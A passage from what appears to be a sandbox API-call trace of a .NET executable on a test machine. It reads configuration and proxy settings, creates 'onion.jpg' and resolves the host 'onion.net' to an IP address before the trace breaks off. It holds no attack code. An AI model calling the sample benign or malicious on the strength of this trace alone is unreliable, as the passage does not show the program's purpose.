LoadLibraryExW (lpLibFileName="C:\\WINDOWS\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x1520001 [0235.087] CoTaskMemAlloc (cb=0x3ec) returned 0x13b31f8 [0235.087] LoadStringW (in: hInstance=0x1520001, uID=0x142, lpBuffer=0x13b31f8, cchBufferMax=500 | out: lpBuffer="W. Europe Standard Time") returned 0x17 [0235.087] CoTaskMemFree (pv=0x13b31f8) [0235.087] FreeLibrary (hLibModule=0x1520001) returned 1 [0235.088] CoTaskMemAlloc (cb=0x20c) returned 0x13aa078 [0235.088] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x13aa078 | out: pszPath="C:\\WINDOWS\\system32") returned 0x0 [0235.089] CoTaskMemFree (pv=0x13aa078) [0235.089] CoTaskMemAlloc (cb=0x20c) returned 0x13aa078 [0235.089] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\WINDOWS\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x116ebdc, pwszFileMUIPath=0x13aa078, pcchFileMUIPath=0x116ebe0, pululEnumerator=0x116ebd4 | out: pwszLanguage=0x0, pcchLanguage=0x116ebdc, pwszFileMUIPath="C:\\WINDOWS\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x116ebe0, pululEnumerator=0x116ebd4) returned 1 [0235.090] CoTaskMemFree (pv=0x0) [0235.090] CoTaskMemFree (pv=0x13aa078) [0235.090] LoadLibraryExW (lpLibFileName="C:\\WINDOWS\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x1520001 [0235.092] CoTaskMemAlloc (cb=0x3ec) returned 0x13b31f8 [0235.092] LoadStringW (in: hInstance=0x1520001, uID=0x141, lpBuffer=0x13b31f8, cchBufferMax=500 | out: lpBuffer="W. Europe Daylight Time") returned 0x17 [0235.092] CoTaskMemFree (pv=0x13b31f8) [0235.092] FreeLibrary (hLibModule=0x1520001) returned 1 [0235.094] RegCloseKey (hKey=0x344) returned 0x0 [0235.729] WriteFile (in: hFile=0xe4, lpBuffer=0x31a3e44*, nNumberOfBytesToWrite=0x3d, lpNumberOfBytesWritten=0x116edcc, lpOverlapped=0x0 | out: lpBuffer=0x31a3e44*, lpNumberOfBytesWritten=0x116edcc*=0x3d, lpOverlapped=0x0) returned 1 [0235.737] CloseHandle (hObject=0xe4) returned 1 [0235.796] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3d8 [0235.796] WriteFile (in: hFile=0x3d8, lpBuffer=0x116ee14*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x116ee18, lpOverlapped=0x0 | out: lpBuffer=0x116ee14*, lpNumberOfBytesWritten=0x116ee18*=0x0, lpOverlapped=0x0) returned 1 [0235.810] GetFileType (hFile=0x3d8) returned 0x3 [0235.811] WriteFile (in: hFile=0x3d8, lpBuffer=0x31a547c*, nNumberOfBytesToWrite=0x25, lpNumberOfBytesWritten=0x116edf4, lpOverlapped=0x0 | out: lpBuffer=0x31a547c*, lpNumberOfBytesWritten=0x116edf4*=0x25, lpOverlapped=0x0) returned 1 [0246.271] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\onc2pn4u4214.exe.config", nBufferLength=0x105, lpBuffer=0x116e7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\onc2pn4u4214.exe.config", lpFilePart=0x0) returned 0x2f [0251.672] GetCurrentProcess () returned 0xffffffff [0251.673] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x116eb28 | out: TokenHandle=0x116eb28*=0x344) returned 1 [0251.820] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", nBufferLength=0x105, lpBuffer=0x116e5b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", lpFilePart=0x0) returned 0x2e [0251.825] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x116eb20 | out: lpFileInformation=0x116eb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56a29ff, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97df7583, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97df7583, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0251.830] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x116e580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0251.832] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x116eb28 | out: lpFileInformation=0x116eb28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56a29ff, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97df7583, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97df7583, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0251.832] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x116e51c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0251.833] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x116ea60) returned 1 [0251.833] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0251.833] GetFileType (hFile=0x264) returned 0x1 [0251.833] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x116ea5c) returned 1 [0251.834] GetFileType (hFile=0x264) returned 0x1 [0252.384] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\XML", ulOptions=0x0, samDesired=0x20019, phkResult=0x116eaac | out: phkResult=0x116eaac*=0x0) returned 0x2 [0252.385] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\XML", ulOptions=0x0, samDesired=0x20019, phkResult=0x116eaac | out: phkResult=0x116eaac*=0x0) returned 0x2 [0252.389] GetFileSize (in: hFile=0x264, lpFileSizeHigh=0x116eb1c | out: lpFileSizeHigh=0x116eb1c*=0x0) returned 0x8c8f [0252.390] ReadFile (in: hFile=0x264, lpBuffer=0x31a8e54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x116ead8, lpOverlapped=0x0 | out: lpBuffer=0x31a8e54*, lpNumberOfBytesRead=0x116ead8*=0x1000, lpOverlapped=0x0) returned 1 [0252.722] ReadFile (in: hFile=0x264, lpBuffer=0x31a8e54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x116e984, lpOverlapped=0x0 | out: lpBuffer=0x31a8e54*, lpNumberOfBytesRead=0x116e984*=0x1000, lpOverlapped=0x0) returned 1 [0252.728] ReadFile (in: hFile=0x264, lpBuffer=0x31a8e54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x116e838, lpOverlapped=0x0 | out: lpBuffer=0x31a8e54*, lpNumberOfBytesRead=0x116e838*=0x1000, lpOverlapped=0x0) returned 1 [0252.732] ReadFile (in: hFile=0x264, lpBuffer=0x31a8e54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x116e838, lpOverlapped=0x0 | out: lpBuffer=0x31a8e54*, lpNumberOfBytesRead=0x116e838*=0x1000, lpOverlapped=0x0) returned 1 [0252.733] ReadFile (in: hFile=0x264, lpBuffer=0x31a8e54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x116e838, lpOverlapped=0x0 | out: lpBuffer=0x31a8e54*, lpNumberOfBytesRead=0x116e838*=0x1000, lpOverlapped=0x0) returned 1 [0252.733] ReadFile (in: hFile=0x264, lpBuffer=0x31a8e54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x116e770, lpOverlapped=0x0 | out: lpBuffer=0x31a8e54*, lpNumberOfBytesRead=0x116e770*=0x1000, lpOverlapped=0x0) returned 1 [0253.401] ReadFile (in: hFile=0x264, lpBuffer=0x31a8e54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x116e8f4, lpOverlapped=0x0 | out: lpBuffer=0x31a8e54*, lpNumberOfBytesRead=0x116e8f4*=0x1000, lpOverlapped=0x0) returned 1 [0253.406] ReadFile (in: hFile=0x264, lpBuffer=0x31a8e54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x116e800, lpOverlapped=0x0 | out: lpBuffer=0x31a8e54*, lpNumberOfBytesRead=0x116e800*=0x1000, lpOverlapped=0x0) returned 1 [0253.407] ReadFile (in: hFile=0x264, lpBuffer=0x31a8e54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x116e800, lpOverlapped=0x0 | out: lpBuffer=0x31a8e54*, lpNumberOfBytesRead=0x116e800*=0xc8f, lpOverlapped=0x0) returned 1 [0253.408] ReadFile (in: hFile=0x264, lpBuffer=0x31a8e54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x116e8c4, lpOverlapped=0x0 | out: lpBuffer=0x31a8e54*, lpNumberOfBytesRead=0x116e8c4*=0x0, lpOverlapped=0x0) returned 1 [0253.409] CloseHandle (hObject=0x264) returned 1 [0253.414] GetCurrentProcess () returned 0xffffffff [0253.414] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x116ec70 | out: TokenHandle=0x116ec70*=0x264) returned 1 [0253.416] GetCurrentProcess () returned 0xffffffff [0253.416] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x116ec70 | out: TokenHandle=0x116ec70*=0x350) returned 1 [0253.418] GetCurrentProcess () returned 0xffffffff [0253.418] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x116eb28 | out: TokenHandle=0x116eb28*=0x354) returned 1 [0253.418] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\onc2pn4u4214.exe.config" (normalized: "c:\\users\\fd1hvy\\desktop\\onc2pn4u4214.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x116eb20 | out: lpFileInformation=0x116eb20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0253.419] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\onc2pn4u4214.exe.config", nBufferLength=0x105, lpBuffer=0x116e580, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\onc2pn4u4214.exe.config", lpFilePart=0x0) returned 0x2f [0253.420] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\onc2pn4u4214.exe.config" (normalized: "c:\\users\\fd1hvy\\desktop\\onc2pn4u4214.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x116eb28 | out: lpFileInformation=0x116eb28*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0253.421] GetCurrentProcess () returned 0xffffffff [0253.421] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x116ec70 | out: TokenHandle=0x116ec70*=0x358) returned 1 [0253.422] GetCurrentProcess () returned 0xffffffff [0253.422] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x116ec70 | out: TokenHandle=0x116ec70*=0x35c) returned 1 [0253.904] GetCurrentProcess () returned 0xffffffff [0253.904] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x116ead0 | out: TokenHandle=0x116ead0*=0x360) returned 1 [0255.069] GetCurrentProcess () returned 0xffffffff [0255.069] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x116eae0 | out: TokenHandle=0x116eae0*=0x364) returned 1 [0255.195] GetFullPathNameW (in: lpFileName="onion.jpg", nBufferLength=0x105, lpBuffer=0x116e8ac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\onion.jpg", lpFilePart=0x0) returned 0x21 [0255.196] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x116edf0) returned 1 [0255.196] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\onion.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\onion.jpg"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x368 [0255.301] GetFileType (hFile=0x368) returned 0x1 [0255.301] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x116edec) returned 1 [0255.301] GetFileType (hFile=0x368) returned 0x1 [0255.326] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x36c [0255.327] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x370 [0255.398] GetCurrentProcess () returned 0xffffffff [0255.399] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x116eaf0 | out: TokenHandle=0x116eaf0*=0x374) returned 1 [0255.410] GetCurrentProcess () returned 0xffffffff [0255.411] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x116eb00 | out: TokenHandle=0x116eb00*=0x378) returned 1 [0255.500] QueryPerformanceFrequency (in: lpFrequency=0x1315c08 | out: lpFrequency=0x1315c08*=100000000) returned 1 [0255.501] QueryPerformanceCounter (in: lpPerformanceCount=0x116ee74 | out: lpPerformanceCount=0x116ee74*=34991145002) returned 1 [0255.514] GetCurrentProcess () returned 0xffffffff [0255.514] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x116eabc | out: TokenHandle=0x116eabc*=0x37c) returned 1 [0255.582] GetCurrentProcess () returned 0xffffffff [0255.582] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x116eacc | out: TokenHandle=0x116eacc*=0x380) returned 1 [0257.060] GetCurrentProcess () returned 0xffffffff [0257.061] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x116ead0 | out: TokenHandle=0x116ead0*=0x384) returned 1 [0257.069] GetCurrentProcess () returned 0xffffffff [0257.069] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x116eae0 | out: TokenHandle=0x116eae0*=0x388) returned 1 [0257.084] GetCurrentProcess () returned 0xffffffff [0257.084] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x116ed58 | out: TokenHandle=0x116ed58*=0x38c) returned 1 [0257.274] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0x116de94 | out: phkResult=0x116de94*=0x390) returned 0x0 [0257.276] RegQueryValueExW (in: hKey=0x390, lpValueName="InstallationType", lpReserved=0x0, lpType=0x116deb4, lpData=0x0, lpcbData=0x116deb0*=0x0 | out: lpType=0x116deb4*=0x1, lpData=0x0, lpcbData=0x116deb0*=0xe) returned 0x0 [0257.276] RegQueryValueExW (in: hKey=0x390, lpValueName="InstallationType", lpReserved=0x0, lpType=0x116deb4, lpData=0x31cb20c, lpcbData=0x116deb0*=0xe | out: lpType=0x116deb4*=0x1, lpData="Client", lpcbData=0x116deb0*=0xe) returned 0x0 [0257.276] RegCloseKey (hKey=0x390) returned 0x0 [0258.186] CoTaskMemAlloc (cb=0xcc0) returned 0x13bf8b8 [0258.389] RasEnumConnectionsW (in: param_1=0x13bf8b8, param_2=0x116ed68, param_3=0x116ed6c | out: param_1=0x13bf8b8, param_2=0x116ed68, param_3=0x116ed6c) returned 0x0 [0258.869] CoTaskMemFree (pv=0x13bf8b8) [0259.026] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x116eb54 | out: lpWSAData=0x116eb54) returned 0 [0259.047] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x408 [0259.171] setsockopt (s=0x408, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0259.172] closesocket (s=0x408) returned 0 [0259.173] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x408 [0259.177] setsockopt (s=0x408, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0259.177] closesocket (s=0x408) returned 0 [0259.178] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x408 [0259.180] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x40c [0259.182] ioctlsocket (in: s=0x408, cmd=-2147195266, argp=0x116ed70 | out: argp=0x116ed70) returned 0 [0259.183] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x410 [0259.184] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x414 [0259.184] ioctlsocket (in: s=0x410, cmd=-2147195266, argp=0x116ed70 | out: argp=0x116ed70) returned 0 [0259.187] WSAIoctl (in: s=0x408, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x116ed58, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x116ed58, lpOverlapped=0x0) returned -1 [0259.190] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x116ea88, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0259.198] WSAEventSelect (s=0x408, hEventObject=0x40c, lNetworkEvents=512) returned 0 [0259.199] WSAIoctl (in: s=0x410, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x116ed58, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x116ed58, lpOverlapped=0x0) returned -1 [0259.199] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x116ea88, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0259.199] WSAEventSelect (s=0x410, hEventObject=0x414, lNetworkEvents=512) returned 0 [0259.200] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x41c [0259.201] RasConnectionNotificationW (param_1=0xffffffff, param_2=0x41c, param_3=0x3) returned 0x0 [0259.418] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x116ed84 | out: phkResult=0x116ed84*=0x434) returned 0x0 [0259.421] RegOpenKeyExW (in: hKey=0x434, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x116ed38 | out: phkResult=0x116ed38*=0x438) returned 0x0 [0259.421] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x43c [0259.422] RegNotifyChangeKeyValue (hKey=0x438, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x43c, fAsynchronous=1) returned 0x0 [0259.426] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x116ed3c | out: phkResult=0x116ed3c*=0x440) returned 0x0 [0259.427] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x444 [0259.427] RegNotifyChangeKeyValue (hKey=0x440, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x444, fAsynchronous=1) returned 0x0 [0259.429] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x116ed3c | out: phkResult=0x116ed3c*=0x448) returned 0x0 [0259.430] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x44c [0259.430] RegNotifyChangeKeyValue (hKey=0x448, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x44c, fAsynchronous=1) returned 0x0 [0259.431] GetCurrentProcess () returned 0xffffffff [0259.432] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x116ed28 | out: TokenHandle=0x116ed28*=0x450) returned 1 [0259.611] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x116e630 | out: phkResult=0x116e630*=0x460) returned 0x0 [0259.611] RegQueryValueExW (in: hKey=0x460, lpValueName="LegacyWPADSupport", lpReserved=0x0, lpType=0x116e64c, lpData=0x0, lpcbData=0x116e648*=0x0 | out: lpType=0x116e64c*=0x0, lpData=0x0, lpcbData=0x116e648*=0x0) returned 0x2 [0259.611] RegCloseKey (hKey=0x460) returned 0x0 [0259.927] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x13c8468 [0260.446] WinHttpSetTimeouts (hInternet=0x13c8468, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1 [0260.448] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x116ed38 | out: pProxyConfig=0x116ed38) returned 1 [0262.807] CoTaskMemAlloc (cb=0x20c) returned 0x13d8858 [0262.807] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.HttpWebRequest_Disabled", lpBuffer=0x13d8858, nSize=0x104 | out: lpBuffer="ꀘļ慀ļꣀĀฐ") returned 0x0 [0262.807] CoTaskMemFree (pv=0x13d8858) [0262.808] CoTaskMemAlloc (cb=0x20c) returned 0x13d8858 [0262.808] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.HttpWebRequest_MinCount", lpBuffer=0x13d8858, nSize=0x104 | out: lpBuffer="ꀘļ慀ļꣀĀฐ") returned 0x0 [0262.808] CoTaskMemFree (pv=0x13d8858) [0262.988] EtwEventRegister (in: ProviderId=0x31ce1c8, EnableCallback=0x5b005be, CallbackContext=0x0, RegHandle=0x31ce1a4 | out: RegHandle=0x31ce1a4) returned 0x0 [0263.025] GetCurrentProcess () returned 0xffffffff [0263.025] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x116ea98 | out: TokenHandle=0x116ea98*=0x498) returned 1 [0263.031] GetCurrentProcess () returned 0xffffffff [0263.031] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x116eaa8 | out: TokenHandle=0x116eaa8*=0x4a4) returned 1 [0263.605] EtwEventRegister (in: ProviderId=0x31cf790, EnableCallback=0x5b005e6, CallbackContext=0x0, RegHandle=0x31cf76c | out: RegHandle=0x31cf76c) returned 0x0 [0263.605] EtwEventSetInformation (RegHandle=0x13b2290, InformationClass=0x57, EventInformation=0x2, InformationLength=0x31cf730) returned 0x0 [0263.618] SetEvent (hEvent=0x36c) returned 1 [0264.180] GetCurrentProcess () returned 0xffffffff [0264.181] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x116e9ec | out: TokenHandle=0x116e9ec*=0x4c0) returned 1 [0264.183] GetCurrentProcess () returned 0xffffffff [0264.183] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x116e9fc | out: TokenHandle=0x116e9fc*=0x4c4) returned 1 [0264.186] SetEvent (hEvent=0x36c) returned 1 [0264.834] GetNetworkParams (in: pFixedInfo=0x0, pOutBufLen=0x116ecc8 | out: pFixedInfo=0x0, pOutBufLen=0x116ecc8) returned 0x6f [0268.743] LocalAlloc (uFlags=0x0, uBytes=0x248) returned 0x13daef0 [0268.743] GetNetworkParams (in: pFixedInfo=0x13daef0, pOutBufLen=0x116ecc8 | out: pFixedInfo=0x13daef0, pOutBufLen=0x116ecc8) returned 0x0 [0269.328] LocalFree (hMem=0x13daef0) returned 0x0 [0269.338] CoTaskMemAlloc (cb=0x20c) returned 0x13dec50 [0269.338] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.Connection_Disabled", lpBuffer=0x13dec50, nSize=0x104 | out: lpBuffer="껰Ľ橨ļ") returned 0x0 [0269.340] CoTaskMemFree (pv=0x13dec50) [0269.340] CoTaskMemAlloc (cb=0x20c) returned 0x13dec50 [0269.340] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.Connection_MinCount", lpBuffer=0x13dec50, nSize=0x104 | out: lpBuffer="껰Ľ橨ļ") returned 0x0 [0269.341] CoTaskMemFree (pv=0x13dec50) [0269.356] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x510 [0269.660] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4dc [0269.663] GetAddrInfoW (in: pNodeName="onion.net", pServiceName=0x0, pHints=0x116ebb0*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x116eb58 | out: ppResult=0x116eb58*=0x13c66f0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="onion.net", ai_addr=0x13c8350*(sa_family=2, sin_port=0x0, sin_addr="217.194.236.100"), ai_next=0x0)) returned 0 [0271.121] FreeAddrInfoW (pAddrInfo=0x13c66f0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="onion.net", ai_addr=0x13c8350*(sa_family=2, sin_port=0x0, sin_addr="217.194.236.100"), ai_next=0x0)) [0271.312] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x540 [0271.313] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x544 [0271.314] ioctlsocket (in: s=0x540, cmd=-2147195266, argp=0x116eb84 | out: argp=0x116eb84) returned 0 [0271.314] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x548 [0271.315] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x54c [0271.315] ioctlsocket (in: s=0x548, cmd=-2147195266, argp=0x116eb84 | out: argp=0x116eb84) returned 0 [0271.316] WSAIoctl (in: s=0x540, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x116eb6c, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x116eb6c, lpOverlapped=0x0) returned -1 [0271.317] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x116e89c, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0271.317] WSAEventSelect (s=0x540, hEventObject=0x544, lNetworkEvents=512) returned 0 [0271.318] WSAIoctl (in: s=0x548, 